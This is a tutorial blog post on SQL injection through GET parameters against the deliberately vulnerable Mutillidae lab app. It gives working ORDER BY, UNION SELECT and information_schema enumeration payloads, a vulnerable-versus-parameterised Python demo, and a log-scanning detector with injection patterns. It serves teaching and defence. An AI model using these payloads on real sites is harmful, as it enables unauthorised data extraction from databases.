SQL Injection - GET Request
Definitions*
What is Mutillidae?
Mutillidae II is a free, open source, deliberately vulnerable web application providing a target for web-security enthusiasts.
What is a SQL Injection?
- SQL injection (also known as SQL fishing) is a technique often used to attack data-driven applications.
- This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
- The vulnerability occurs when user input is either incorrectly filtered for string-literal escape characters embedded in SQL statements, or is not strongly typed and is unexpectedly executed as part of the query. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
_______________________ Main Content _____________________________
SQL injection for GET type requests:
In a GET request, the username and password submitted on pages such as the login page are visible in the address bar / HTTP request, so we will try to inject our code through the GET parameters and exploit the vulnerability.
I will be using Mutillidae >> OWASP TOP 10 >> Injections >> SQL Extract Data >> User Info as the page to experiment on. [I have hosted a Kali and a Metasploitable VM in the same virtual network]
So when you reach the page, in the address bar you will find something like:
>>[IP]/mutillidae/index.php?page=user-info.php
Enter a dummy id and password, for example Name = Me & Password = 12345; this will give you:
Bonus tip: to easily share and copy-paste data between the VM and the host, just go to the VM settings >> General >> Advanced and set the shared clipboard to bidirectional.
So, it is quite evident that there must be some database that is being used by the web page to authorize the user login, and the data that is being fed in through the GET request must be used as input to a query against that database. We will use this as a way to play around with the database and get access to critical data such as logins and passwords.
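To make that idea concrete, here is an added example (Python with SQLite; not code from the original post or from Mutillidae itself) showing the vulnerable pattern, where the GET parameters are concatenated straight into the SQL text, next to the parameterised form that fixes it. The five-column accounts table and its rows are constructed for the demo (the column names are an assumption), and the table-listing payload is the post's information_schema.tables injection adapted to SQLite, where sqlite_master plays that role and "--" is the comment marker, since SQLite has no "#" comments.

```python
import sqlite3

# Constructed demo schema: a five-column accounts table of the kind the
# walkthrough enumerates with ORDER BY 5 (column names are an assumption).
DEMO_SCHEMA = """
CREATE TABLE accounts (
    cid INTEGER PRIMARY KEY,
    username TEXT,
    password TEXT,
    mysignature TEXT,
    is_admin TEXT
);
INSERT INTO accounts VALUES (1, 'admin', 'adminpass', 'Monkey!', 'TRUE');
INSERT INTO accounts VALUES (2, 'Me', '12345', 'hello', 'FALSE');
CREATE TABLE credit_cards (ccid INTEGER PRIMARY KEY, ccnumber TEXT, ccv TEXT);
"""


def demo_db():
    """Fresh in-memory database loaded with the constructed schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(DEMO_SCHEMA)
    return conn


def build_query_unsafe(username, password):
    """The vulnerable pattern: request parameters spliced into the SQL text.
    Anything in the value, including a quote, UNION or a comment marker, is
    parsed as SQL structure rather than treated as data."""
    return ("SELECT cid, username, password, mysignature, is_admin "
            "FROM accounts WHERE username='" + username +
            "' AND password='" + password + "'")


def lookup_unsafe(conn, username, password):
    return conn.execute(build_query_unsafe(username, password)).fetchall()


def lookup_safe(conn, username, password):
    """Hardened form: placeholders. The driver passes the values separately
    from the query text, so they can only ever be compared against the column
    and never change the shape of the statement."""
    sql = ("SELECT cid, username, password, mysignature, is_admin "
           "FROM accounts WHERE username=? AND password=?")
    return conn.execute(sql, (username, password)).fetchall()


# The walkthrough's table-listing injection, adapted to SQLite for this demo
# (assumption): sqlite_master stands in for information_schema.tables, the
# leading quote closes the literal the application opened, and "--" replaces
# MySQL's "#" because SQLite does not treat "#" as a comment.
TABLE_LIST_INJECTION = (
    "Me' UNION SELECT 1, name, NULL, NULL, 5 "
    "FROM sqlite_master WHERE type='table' --"
)


def demo():
    """Returns (normal login rows, rows leaked by the unsafe query,
    rows returned by the safe query for the same hostile input)."""
    conn = demo_db()
    normal = lookup_safe(conn, "Me", "12345")
    leaked = lookup_unsafe(conn, TABLE_LIST_INJECTION, "12345")
    blocked = lookup_safe(conn, TABLE_LIST_INJECTION, "12345")
    return normal, leaked, blocked


if __name__ == "__main__":
    normal, leaked, blocked = demo()
    print("normal login:", normal)
    print("unsafe query leaks table names:", [row[1] for row in leaked])
    print("safe query with the same input:", blocked)
```

The unsafe path returns the catalogue's table names as if they were account rows, because the value rewrote the statement; the parameterised path returns nothing, because the entire injected string is simply compared against the username column and matches no account.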
Any time you see index.php? and parameters such as page=user-info.php and username=, you should try to inject stuff in there.
First of all we will play with injecting something to bypass the password authorization; then we will use the order by clause in SQL to find out the number of columns in the SQL database in use.
Now, to check if the SQL injection works, tweak the address as follows:
>> http://[IP]/mutillidae/index.php?page=user-info.php&username=Me order by 1 #&password=12345&user-info-php-submit-button=View+Account+Details
By putting the # we commented out everything that follows it, i.e. the password check; now press enter and see if the address works.
Didn't work, right! Ha Ha Ha
So, here's the trick: when you use a hash symbol in the address bar it needs to be URL-encoded, because the browser otherwise treats # as the start of the URL fragment and never sends it to the server. I used https://www.urlencoder.org/ to encode #, which turned out to be %23.
This will work:
>> http://[IP]/mutillidae/index.php?page=user-info.php&username=Me order by 1 %23&password=12345&user-info-php-submit-button=View+Account+Details
Our Next Objective:
Now we need to know the number of columns returned by the query the login PHP page uses, so just use trial and error, such as order by 1000 or order by 5; you will get an error until you put the right (maximum) number of columns in the order by command.
Further, we can pull details such as the database name, the database user and the server version by using a UNION, as shown below:
>> http://[IP]/mutillidae/index.php?page=user-info.php&username=Me union select 1,database(),user(),version(),5 %23&password=12345&user-info-php-submit-button=View+Account+Details
Yup, I have included 5 columns in the union syntax, as the order by probe showed that the query returns 5 columns.
Wait, let's make it more interesting. We know that the database server behind such websites has a database called information_schema, which holds the details of all the tables currently present on the server.
So, what we will do is upgrade the injection to look something like:
>> http://[IP]/mutillidae/index.php?page=user-info.php&username=Me union select 1,table_name,null,null,5 from information_schema.tables %23&password=12345&user-info-php-submit-button=View+Account+Details
This gets us back the names of all the tables on the server, taken from information_schema.
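From the defender's side, every one of these requests leaves a trace in the web-server access log, but the tell-tale strings only show up once the query string is URL-decoded (%23 back to #, + back to a space). The following added example, which is not part of the original post, parses a few constructed Apache-style log lines modelled on the requests above and flags the order by probe, the UNION SELECT and the information_schema lookup; the addresses, timestamps and byte counts are made up.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache-style access-log lines modelled on the walkthrough's
# requests; client addresses, timestamps and byte counts are made up.
SAMPLE_LOG = """\
10.0.2.15 - - [01/Jan/2024:10:00:01 +0000] "GET /mutillidae/index.php?page=user-info.php&username=Me&password=12345&user-info-php-submit-button=View+Account+Details HTTP/1.1" 200 5123
10.0.2.15 - - [01/Jan/2024:10:00:09 +0000] "GET /mutillidae/index.php?page=user-info.php&username=Me+order+by+1+%23&password=12345&user-info-php-submit-button=View+Account+Details HTTP/1.1" 200 5321
10.0.2.15 - - [01/Jan/2024:10:00:31 +0000] "GET /mutillidae/index.php?page=user-info.php&username=Me+union+select+1,database(),user(),version(),5+%23&password=12345&user-info-php-submit-button=View+Account+Details HTTP/1.1" 200 5402
10.0.2.15 - - [01/Jan/2024:10:00:58 +0000] "GET /mutillidae/index.php?page=user-info.php&username=Me+union+select+1,table_name,null,null,5+from+information_schema.tables+%23&password=12345&user-info-php-submit-button=View+Account+Details HTTP/1.1" 200 9120
10.0.2.7 - - [01/Jan/2024:10:01:02 +0000] "GET /mutillidae/index.php?page=home.php HTTP/1.1" 200 2048
"""

# Common/combined log format: client, ident, user, [timestamp], "request", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators are matched against the *decoded* parameter value, so %23 is
# seen as the "#" comment marker and "+" as a space.
INDICATORS = [
    ("sql-comment", re.compile(r"#|--")),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema-enumeration", re.compile(r"\binformation_schema\b", re.I)),
]


def parse_line(line):
    """Split one access-log line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_query(target):
    """Decode every query-string parameter of a request target and return
    {parameter: [indicator names]} for the parameters that look like SQL."""
    hits = {}
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        matched = [label for label, rx in INDICATORS if rx.search(value)]
        if matched:
            hits[name] = matched
    return hits


def scan_log(text):
    """One finding per suspicious request: who, when, which parameter, why."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        for param, labels in scan_query(rec["target"]).items():
            findings.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "status": rec["status"],
                "param": param,
                "indicators": labels,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} param={f['param']} "
              f"indicators={','.join(f['indicators'])}")
```

The decoding step is the important part: a rule that searches the raw log line for "#" would miss every request here, because the browser sent %23, while a rule keyed on "union select" would miss the `+`-encoded spaces. Decoding each parameter value first, then matching, sees the same text the application's query builder saw.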
Let's make it more Mutillidae specific by restricting the lookup to the application's own schema, owasp10:
>> http://[IP]/mutillidae/index.php?page=user-info.php&username=Me union select 1,table_name,null,null,5 from information_schema.tables where table_schema = 'owasp10'%23&password=12345&user-info-php-submit-button=View+Account+Details
Thanks & Regards